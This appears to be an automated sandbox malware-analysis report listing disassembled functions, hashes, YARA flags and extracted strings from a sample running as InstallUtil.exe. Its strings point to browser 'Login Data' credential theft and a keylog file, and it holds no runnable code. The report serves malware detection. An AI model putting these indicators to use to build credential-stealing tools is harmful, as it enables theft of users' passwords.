Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdfc4ddab8023d3ea956a554c86372121b1110d9d5481ad7ff384b7be8a39460
Instruction ID: cb5e04007c89fd0da6dd56a524d5b32fba6e45633b49a61451d8b8ac9e95c8ac
Opcode Fuzzy Hash: bdfc4ddab8023d3ea956a554c86372121b1110d9d5481ad7ff384b7be8a39460
Instruction Fuzzy Hash: C3A02434300400CF4401045051451DC7D10F1C1331370FF41C44D3C01355C00CC33DD1

Function 00E10848 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1391782684.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d174abebdd68cf099bb2fd2699306f3c534ea0dcd256fb461748dbad92489a
Instruction ID: 8faabb6ff94ade19a9db0d51e8e452acacbb0b22476556bf09c3f497c7ac2b81
Opcode Fuzzy Hash: 07d174abebdd68cf099bb2fd2699306f3c534ea0dcd256fb461748dbad92489a
Instruction Fuzzy Hash: 06A0113002030A8B8A803BA2BC0E0AA3BACEA802023800022F00EC0220AAA028008BA0

Function 00E10E77 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1391782684.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d4cf2aede163a8449620d277fe3efb5bb380f584a93462587cbe1144e54320
Instruction ID: 29500b9fe8a672a31931288da1e3f540c47453926629b2034d1503039fa3dd82
Opcode Fuzzy Hash: f2d4cf2aede163a8449620d277fe3efb5bb380f584a93462587cbe1144e54320
Instruction Fuzzy Hash:

Analysis Process: InstallUtil.exePID: 7444, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	17%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	75%
Total number of Nodes:	12
Total number of Limit Nodes:	2

Executed Functions

Function 00435A20 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H.@, xrefs: 00435A49

Memory Dump Source

Source File: 0000000E.00000002.2479512482.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_42c000_InstallUtil.jbxd

Similarity

API ID:
String ID: H.@
API String ID: 0-4229123542
Opcode ID: 98a239df08bf664ef06bb8ac38deb9684f0b5701f6c0c407cc3e468271e137f9
Instruction ID: c20a7ba01d91696db84d9f3e6d105138a01f6d641f40259d7b0572a0b95bb64f
Opcode Fuzzy Hash: 98a239df08bf664ef06bb8ac38deb9684f0b5701f6c0c407cc3e468271e137f9
Instruction Fuzzy Hash: 54125A75900209EFDB04DFA4DE89AEEBBB9FB48700F10816AF505B72A0DB745945CF68

Function 0040E410 Relevance: 50.0, Strings: 38, Instructions: 2463COMMON

Download Yara Rule

Strings

@, xrefs: 00410F53
\User Data\Default\Login Data, xrefs: 004108EE, 00410C3F
iWPuXrAKZLd, xrefs: 0040E720
yogxMrHYpAOcRXIXQjKVTvYscEHqCkMk, xrefs: 0040EAC3
LfkKTGWaNSUtgCNuBfXpHFmrWJyFCWESw, xrefs: 0040F5D6
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00410327, 00410633
ZXiSMAuMFLKtyTbpgSARWD, xrefs: 0040E7C3
4FCDCEE6179E8F, xrefs: 0040E5B8
tuQRYgtgmYbQJFIHkmrcSSZPIwxYOGMdSt, xrefs: 0040E8EE
6CADBAB0184A2F8C, xrefs: 0040E866
bqMRUpmiGmruGyoSMWHQUBZ, xrefs: 0040F75B
8D6B3ECFD52831B7B7BDC465, xrefs: 0040E844
17964290DE9B61DBC248, xrefs: 0040E9FE
HleGZsxwPpLI, xrefs: 0040EA20
XrGwgbeGkomJHyySLDwyGSR, xrefs: 0040E5DA
A4B5F7337272BDF6, xrefs: 0040E6FE
o, xrefs: 0040F90A
C471ABF15B710293, xrefs: 0040E65B
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00410352, 0041065E
f, xrefs: 004105E3, 00410B17, 00410F86
DD3A153AB7C6AEFFDC932FC701, xrefs: 0040EB44
hIxdsCxsSlmJgXKItXIhbObKEOrfHUqtqHbQNtSvZ, xrefs: 0040EB66
9, xrefs: 0040F47F
\User Data, xrefs: 0041057F, 00410F22
EAEBDCD48AAD2104B340F7, xrefs: 00410CCB, 00410FD6
v, xrefs: 0040FDBE
bXfDoiUooUKeuhsfFdlSGDvxpdvjqKLaaA, xrefs: 0040F204
633C49B1222501DDEF05C4, xrefs: 0040E7A1
zJcSGZpHRWXEBw, xrefs: 0040E888
0F229251E8EB8B, xrefs: 0040EAA1
oxRIlCYoAxkQxlrscYOxbEEmlCmWrVoCIPpNsOonQT, xrefs: 0040EC09
4B6309591B, xrefs: 0040EBE7
qXmCbAMOsLPNnNNYGajngAUUuveHvYcoet, xrefs: 0040E67D
7FB8BE46, xrefs: 0040F1E2
m, xrefs: 0040EF1E, 0040EF35, 0040F11D, 0040F168, 0040F250, 0040F56A, 0040F595, 0040F623, 0040F66D, 0040F6FB, 0040F7A8, 0040F7F2, 0040F81A, 0040F841, 0040F869, 0040FAE9, 0040FB14, 0040FB3E, 0040FB66, 0040FB8E, 0040FBB5, 0040FC3F, 0040FC69, 0040FC94, 0040FCBC, 0040FCE3, 0040FD0B, 0040FE20, 0040FE48, 0040FE70, 0040FE97, 0040FF21, 0040FF48, 0040FF70, 0040FF98, 0041025B, 00410458, 004107AF, 004108F3, 00410C44, 00410DFC
hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf, xrefs: 00410CF6
XqWdptKjWMhBawxIGSPkKJtu, xrefs: 0040F6AE
Z, xrefs: 0040F2E2

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 0F229251E8EB8B$17964290DE9B61DBC248$38AF112504A7220A7B6852AC982D071529E87A$4B6309591B$4FCDCEE6179E8F$633C49B1222501DDEF05C4$6CADBAB0184A2F8C$7FB8BE46$8D6B3ECFD52831B7B7BDC465$9$@$A4B5F7337272BDF6$C471ABF15B710293$DD3A153AB7C6AEFFDC932FC701$EAEBDCD48AAD2104B340F7$HleGZsxwPpLI$LfkKTGWaNSUtgCNuBfXpHFmrWJyFCWESw$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw$XqWdptKjWMhBawxIGSPkKJtu$XrGwgbeGkomJHyySLDwyGSR$Z$ZXiSMAuMFLKtyTbpgSARWD$\User Data$\User Data\Default\Login Data$bXfDoiUooUKeuhsfFdlSGDvxpdvjqKLaaA$bqMRUpmiGmruGyoSMWHQUBZ$f$hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf$hIxdsCxsSlmJgXKItXIhbObKEOrfHUqtqHbQNtSvZ$iWPuXrAKZLd$m$o$oxRIlCYoAxkQxlrscYOxbEEmlCmWrVoCIPpNsOonQT$qXmCbAMOsLPNnNNYGajngAUUuveHvYcoet$tuQRYgtgmYbQJFIHkmrcSSZPIwxYOGMdSt$v$yogxMrHYpAOcRXIXQjKVTvYscEHqCkMk$zJcSGZpHRWXEBw
API String ID: 0-958896631
Opcode ID: dcca085e566cc74f176b83b15465402bfa246b03826875d70924efbe903bef0d
Instruction ID: 8d6110d453f597b600461d2b0b1badf0724fc4ca77baf740a2119d7bb5755da8
Opcode Fuzzy Hash: dcca085e566cc74f176b83b15465402bfa246b03826875d70924efbe903bef0d
Instruction Fuzzy Hash: C5431F75900219DFDB14DFA4EE48BDE77B5FB48300F1081AAE50AB72A0DB745A89CF58

Function 00404356 Relevance: 25.6, Strings: 20, Instructions: 550COMMON

Download Yara Rule

Strings

iWPuXrAKZLd, xrefs: 0040E720
yogxMrHYpAOcRXIXQjKVTvYscEHqCkMk, xrefs: 0040EAC3
ZXiSMAuMFLKtyTbpgSARWD, xrefs: 0040E7C3
4FCDCEE6179E8F, xrefs: 0040E5B8
633C49B1222501DDEF05C4, xrefs: 0040E7A1
zJcSGZpHRWXEBw, xrefs: 0040E888
0F229251E8EB8B, xrefs: 0040EAA1
oxRIlCYoAxkQxlrscYOxbEEmlCmWrVoCIPpNsOonQT, xrefs: 0040EC09
tuQRYgtgmYbQJFIHkmrcSSZPIwxYOGMdSt, xrefs: 0040E8EE
6CADBAB0184A2F8C, xrefs: 0040E866
8D6B3ECFD52831B7B7BDC465, xrefs: 0040E844
4B6309591B, xrefs: 0040EBE7
17964290DE9B61DBC248, xrefs: 0040E9FE
HleGZsxwPpLI, xrefs: 0040EA20
qXmCbAMOsLPNnNNYGajngAUUuveHvYcoet, xrefs: 0040E67D
XrGwgbeGkomJHyySLDwyGSR, xrefs: 0040E5DA
A4B5F7337272BDF6, xrefs: 0040E6FE
C471ABF15B710293, xrefs: 0040E65B
DD3A153AB7C6AEFFDC932FC701, xrefs: 0040EB44
hIxdsCxsSlmJgXKItXIhbObKEOrfHUqtqHbQNtSvZ, xrefs: 0040EB66

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 0F229251E8EB8B$17964290DE9B61DBC248$4B6309591B$4FCDCEE6179E8F$633C49B1222501DDEF05C4$6CADBAB0184A2F8C$8D6B3ECFD52831B7B7BDC465$A4B5F7337272BDF6$C471ABF15B710293$DD3A153AB7C6AEFFDC932FC701$HleGZsxwPpLI$XrGwgbeGkomJHyySLDwyGSR$ZXiSMAuMFLKtyTbpgSARWD$hIxdsCxsSlmJgXKItXIhbObKEOrfHUqtqHbQNtSvZ$iWPuXrAKZLd$oxRIlCYoAxkQxlrscYOxbEEmlCmWrVoCIPpNsOonQT$qXmCbAMOsLPNnNNYGajngAUUuveHvYcoet$tuQRYgtgmYbQJFIHkmrcSSZPIwxYOGMdSt$yogxMrHYpAOcRXIXQjKVTvYscEHqCkMk$zJcSGZpHRWXEBw
API String ID: 0-3032559714
Opcode ID: bf936dc387b81685cac6f718ccc5cc4ca98f897159679c13c38bdb0d5539d4ac
Instruction ID: 306b12424288b9ee79407629f0a620eb15e0193753dcdb20793098ca96b6280d
Opcode Fuzzy Hash: bf936dc387b81685cac6f718ccc5cc4ca98f897159679c13c38bdb0d5539d4ac
Instruction Fuzzy Hash: 9332E972900149EBCB04EFE0DA94EDEB7B9FF58304F10856EE106B6164EB746A49CF64

Function 0040F49F Relevance: 17.3, Strings: 13, Instructions: 1015COMMON

Download Yara Rule

Strings

I, xrefs: 0040F8F7
@, xrefs: 00410F53
\User Data\Default\Login Data, xrefs: 004108EE, 00410C3F
LfkKTGWaNSUtgCNuBfXpHFmrWJyFCWESw, xrefs: 0040F5D6
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00410327, 00410633
\User Data, xrefs: 0041057F, 00410F22
EAEBDCD48AAD2104B340F7, xrefs: 00410CCB, 00410FD6
bqMRUpmiGmruGyoSMWHQUBZ, xrefs: 0040F75B
m, xrefs: 0040F56A, 0040F595, 0040F623, 0040F66D, 0040F6FB, 0040F7A8, 0040F7F2, 0040F81A, 0040F841, 0040F869, 0041025B, 00410458, 004107AF, 004108F3, 00410C44, 00410DFC
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00410352, 0041065E
f, xrefs: 004105E3, 00410B17, 00410F86
hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf, xrefs: 00410CF6
XqWdptKjWMhBawxIGSPkKJtu, xrefs: 0040F6AE

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 38AF112504A7220A7B6852AC982D071529E87A$@$EAEBDCD48AAD2104B340F7$I$LfkKTGWaNSUtgCNuBfXpHFmrWJyFCWESw$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw$XqWdptKjWMhBawxIGSPkKJtu$\User Data$\User Data\Default\Login Data$bqMRUpmiGmruGyoSMWHQUBZ$f$hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf$m
API String ID: 0-2827583118
Opcode ID: f50f87d55e489c70c7829ad99700cf28ffdf9d15e9a2a9c0fdbef1dd9c5ac9ce
Instruction ID: 4d6e6b33d265a72710d631502bf83dff1f8879cf656254ad4f2eb62ac06a5d31
Opcode Fuzzy Hash: f50f87d55e489c70c7829ad99700cf28ffdf9d15e9a2a9c0fdbef1dd9c5ac9ce
Instruction Fuzzy Hash: BFB21B74900219DFDB24DF64ED48BDAB7B5FB49300F1081AAE50AB72A0DB745AC9CF58

Function 0040FA1B Relevance: 13.5, Strings: 10, Instructions: 955COMMON

Download Yara Rule

Strings

r, xrefs: 0040FD1E
@, xrefs: 00410F53
\User Data\Default\Login Data, xrefs: 004108EE, 00410C3F
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00410327, 00410633
m, xrefs: 0040FAE9, 0040FB14, 0040FB3E, 0040FB66, 0040FB8E, 0040FBB5, 0040FC3F, 0040FC69, 0040FC94, 0040FCBC, 0040FCE3, 0040FD0B, 0040FE20, 0040FE48, 0040FE70, 0040FE97, 0041025B, 00410458, 004107AF, 004108F3, 00410C44, 00410DFC
\User Data, xrefs: 0041057F, 00410F22
EAEBDCD48AAD2104B340F7, xrefs: 00410CCB, 00410FD6
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00410352, 0041065E
f, xrefs: 004105E3, 00410B17, 00410F86
hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf, xrefs: 00410CF6

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 38AF112504A7220A7B6852AC982D071529E87A$@$EAEBDCD48AAD2104B340F7$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw$\User Data$\User Data\Default\Login Data$f$hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf$m$r
API String ID: 0-4055227312
Opcode ID: 755598290d829cc33488930794769794fdb74d638300b455e5ee51a1885aaab9
Instruction ID: 284f074d69ae5755c50b861732d822bbeea76685ab8d089b1b5bc7e699315931
Opcode Fuzzy Hash: 755598290d829cc33488930794769794fdb74d638300b455e5ee51a1885aaab9
Instruction Fuzzy Hash: 72A22A74A00219DFDB64DF60ED48BEAB7B5FB49300F1081AAE509B72A0DB745AC5CF58

Function 0040FD51 Relevance: 13.4, Strings: 10, Instructions: 879
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00410F53
\User Data\Default\Login Data, xrefs: 004108EE, 00410C3F
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00410327, 00410633
m, xrefs: 0040FE20, 0040FE48, 0040FE70, 0040FE97, 0040FF21, 0040FF48, 0040FF70, 0040FF98, 0041025B, 00410458, 004107AF, 004108F3, 00410C44, 00410DFC
\User Data, xrefs: 0041057F, 00410F22
EAEBDCD48AAD2104B340F7, xrefs: 00410CCB, 00410FD6
v, xrefs: 0040FDBE
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00410352, 0041065E
f, xrefs: 004105E3, 00410B17, 00410F86
hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf, xrefs: 00410CF6

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 38AF112504A7220A7B6852AC982D071529E87A$@$EAEBDCD48AAD2104B340F7$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw$\User Data$\User Data\Default\Login Data$f$hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf$m$v
API String ID: 0-4141359017
Opcode ID: 291d56092ef5a53b00ef67fd369c1320c8e2b1520eb07f95eb5859082cba3545
Instruction ID: 55aa7f3ff86b92b0d557031e1c0e40b7390d1e4694bf0c4a605244a0f42aed39
Opcode Fuzzy Hash: 291d56092ef5a53b00ef67fd369c1320c8e2b1520eb07f95eb5859082cba3545
Instruction Fuzzy Hash: 05922974900219DFDB24DF64ED88BEAB7B5FB49300F1081AAE509B72A0DB745AC5CF58

Function 0040F302 Relevance: 13.3, Strings: 10, Instructions: 827COMMON

Download Yara Rule

Strings

*, xrefs: 0040F46C
@, xrefs: 00410F53
\User Data\Default\Login Data, xrefs: 004108EE, 00410C3F
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00410327, 00410633
m, xrefs: 0041025B, 00410458, 004107AF, 004108F3, 00410C44, 00410DFC
\User Data, xrefs: 0041057F, 00410F22
EAEBDCD48AAD2104B340F7, xrefs: 00410CCB, 00410FD6
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00410352, 0041065E
f, xrefs: 004105E3, 00410B17, 00410F86
hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf, xrefs: 00410CF6

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: *$38AF112504A7220A7B6852AC982D071529E87A$@$EAEBDCD48AAD2104B340F7$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw$\User Data$\User Data\Default\Login Data$f$hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf$m
API String ID: 0-2924750067
Opcode ID: 0ea3e98e65e3c235502cc4e3cba4c3d96cb52ba131b9d15a3eb43c0b73b31800
Instruction ID: cc387fbca84480fc6b693531be8301e9aca91c6c299bc4c8ffb395a4be21b8a0
Opcode Fuzzy Hash: 0ea3e98e65e3c235502cc4e3cba4c3d96cb52ba131b9d15a3eb43c0b73b31800
Instruction Fuzzy Hash: AF922974900219DFDB24DF64DD88BDAB7B5BB49300F1082EAE509B72A0DB745AC9CF58

Function 0041018E Relevance: 12.0, Strings: 9, Instructions: 731
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00410F53
\User Data\Default\Login Data, xrefs: 004108EE, 00410C3F
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00410327, 00410633
m, xrefs: 0041025B, 00410458, 004107AF, 004108F3, 00410C44, 00410DFC
\User Data, xrefs: 0041057F, 00410F22
EAEBDCD48AAD2104B340F7, xrefs: 00410CCB, 00410FD6
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00410352, 0041065E
f, xrefs: 004105E3, 00410B17, 00410F86
hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf, xrefs: 00410CF6

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 38AF112504A7220A7B6852AC982D071529E87A$@$EAEBDCD48AAD2104B340F7$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw$\User Data$\User Data\Default\Login Data$f$hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf$m
API String ID: 0-938349205
Opcode ID: aee3edd1fe698398b8200e5ac4f3a4f9441fbe154905cf5e2554b78d0d0d3480
Instruction ID: 9b46192651c1778fcc26a108082103ab90340c2cfe32d5c5c14a3486ca862115
Opcode Fuzzy Hash: aee3edd1fe698398b8200e5ac4f3a4f9441fbe154905cf5e2554b78d0d0d3480
Instruction Fuzzy Hash: 42822874900219CFDB24DF64DD88BEAB7B5BB49300F1086EAE509A72A0DB745EC5CF58

Function 004102F2 Relevance: 11.9, Strings: 9, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00410F53
\User Data\Default\Login Data, xrefs: 004108EE, 00410C3F
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00410327, 00410633
m, xrefs: 00410458, 004107AF, 004108F3, 00410C44, 00410DFC
\User Data, xrefs: 0041057F, 00410F22
EAEBDCD48AAD2104B340F7, xrefs: 00410CCB, 00410FD6
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00410352, 0041065E
f, xrefs: 004105E3, 00410B17, 00410F86
hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf, xrefs: 00410CF6

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 38AF112504A7220A7B6852AC982D071529E87A$@$EAEBDCD48AAD2104B340F7$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw$\User Data$\User Data\Default\Login Data$f$hFZTCjjIlkojxrBPZbUCvWQmgCZRinFUDCGCSqAuSOf$m
API String ID: 0-938349205
Opcode ID: 6fefbef7ae6113408037604fdba74644509b414aabcae8180d33e49a6b20ad9d
Instruction ID: aa2e8b2b1ee518cb8fa8f2cbfbde0b1b0ee000f3b876fcf48332d2a53463421c
Opcode Fuzzy Hash: 6fefbef7ae6113408037604fdba74644509b414aabcae8180d33e49a6b20ad9d
Instruction Fuzzy Hash: 5B723874900219CFDB24DF60DD88BEAB7B5BB49300F1086EAE509B7260DB745AC5CF58

Function 0040DFD0 Relevance: 10.3, Strings: 8, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0040E0DE
\KeyData.Log, xrefs: 0040E27A
bRVjadcxpbSpwaZTTxIec, xrefs: 0040E0B7
BEED4B92, xrefs: 0040E095
ogxItqHZUBeLRNCgCaUgIBh, xrefs: 0040E0EC
m, xrefs: 0040E14A, 0040E175, 0040E187, 0040E27F
7D813539748F2FBE, xrefs: 0040E073
DC-KL, xrefs: 0040E1F7

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 7D813539748F2FBE$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$BEED4B92$DC-KL$\KeyData.Log$bRVjadcxpbSpwaZTTxIec$m$ogxItqHZUBeLRNCgCaUgIBh
API String ID: 0-572637629
Opcode ID: 096b7307d824d8f3c9642f5e0e20c01ce7c9b6647d93981fe763182de9251b9f
Instruction ID: 3815ccbe28a3d853ba23501222c60d6bd55810b23b2cebddbd45af20a09d56bd
Opcode Fuzzy Hash: 096b7307d824d8f3c9642f5e0e20c01ce7c9b6647d93981fe763182de9251b9f
Instruction Fuzzy Hash: 90B11F76900209EBDB04DFE4D948ADEBBB4FF48300F10816EE512B72A4DB745A49CB98

Function 0040436E Relevance: 6.6, Strings: 5, Instructions: 383COMMON

Download Yara Rule

Strings

*, xrefs: 0040F46C
7FB8BE46, xrefs: 0040F1E2
m, xrefs: 0040EF1E, 0040EF35, 0040F11D, 0040F168, 0040F250
bXfDoiUooUKeuhsfFdlSGDvxpdvjqKLaaA, xrefs: 0040F204
Z, xrefs: 0040F2E2

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: *$7FB8BE46$Z$bXfDoiUooUKeuhsfFdlSGDvxpdvjqKLaaA$m
API String ID: 0-826128989
Opcode ID: df99ec36dbe4e7678d1e83e2efefcc7c133f481c36fdddf5933df673d2fb75e8
Instruction ID: 47d5d7dc97b00a139e9c5b8201879500ccec384f83610d6852e3b58c9b1e26f5
Opcode Fuzzy Hash: df99ec36dbe4e7678d1e83e2efefcc7c133f481c36fdddf5933df673d2fb75e8
Instruction Fuzzy Hash: 32020375900209EBDB14DFA0EE48BDE7775FB48304F1081ADE605B72A0DB785A89CF68

Function 0040DB70 Relevance: 6.5, Strings: 5, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

kkdwdPbDRtTohnVzTpyWrLeWkRKrtssXg, xrefs: 0040DDE2
BAF0CB52A94274C5DFC2BA7F1C, xrefs: 0040DD9E
m, xrefs: 0040DE47, 0040DE72, 0040DE8A, 0040DEB5, 0040DECC
1B75CE9B9F5A8B777D68236EF6, xrefs: 0040DDC0
HVYxvSBRppbTQoQHvZEdm, xrefs: 0040DE0F

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 1B75CE9B9F5A8B777D68236EF6$BAF0CB52A94274C5DFC2BA7F1C$HVYxvSBRppbTQoQHvZEdm$kkdwdPbDRtTohnVzTpyWrLeWkRKrtssXg$m
API String ID: 0-676413666
Opcode ID: 4cbbc1235c6d6c2e61cb774670129dca48b5fa8bfd341cc36fc10cf06a1fab44
Instruction ID: 2643a76a5649e2b42fe738c927af1c918a2c65ba0bd842f6292ba5030ccd63c5
Opcode Fuzzy Hash: 4cbbc1235c6d6c2e61cb774670129dca48b5fa8bfd341cc36fc10cf06a1fab44
Instruction Fuzzy Hash: F4C11675900209DFDB04DFA4D988BDEBBB5BF48304F1081A9E606B72A4DB749A49CF58

Function 00412978 Relevance: 5.3, Strings: 4, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?, xrefs: 00412E4E
D, xrefs: 00412F11
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00412B74, 00412E80
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00412B49, 00412E55

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_412000_InstallUtil.jbxd

Similarity

API ID:
String ID: 38AF112504A7220A7B6852AC982D071529E87A$?$D$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw
API String ID: 0-4122831561
Opcode ID: c6ab15ea6298a2a85c1d8a2037aacb937613f42c3f07dba6b34e0656b8bc29e1
Instruction ID: 2e540a8eb009949e8c05d8c24a93da029ee763a704de8cfabd4a5123aff7e5df
Opcode Fuzzy Hash: c6ab15ea6298a2a85c1d8a2037aacb937613f42c3f07dba6b34e0656b8bc29e1
Instruction Fuzzy Hash: 0B02F874900219CFDB64DF60EE98BDAB7B1FB49300F1085EAE609A7260DB745AC5CF58

Function 004129B1 Relevance: 5.3, Strings: 4, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?, xrefs: 00412E4E
D, xrefs: 00412F11
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00412B74, 00412E80
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00412B49, 00412E55

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_412000_InstallUtil.jbxd

Similarity

API ID:
String ID: 38AF112504A7220A7B6852AC982D071529E87A$?$D$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw
API String ID: 0-4122831561
Opcode ID: 1fe28dca6fa88dfd3f88431fe233dae8932d5f60a9cb0ed445b3a8b494b47b4b
Instruction ID: e9db7d4980345cbfa9d7ee89896c505c3f3e1f6864e3f78befe81484f3288deb
Opcode Fuzzy Hash: 1fe28dca6fa88dfd3f88431fe233dae8932d5f60a9cb0ed445b3a8b494b47b4b
Instruction Fuzzy Hash: E8F1F874900219CFDB24DF50EE98BEAB775FB45300F1085EAE609A7260DB745AC9CF58

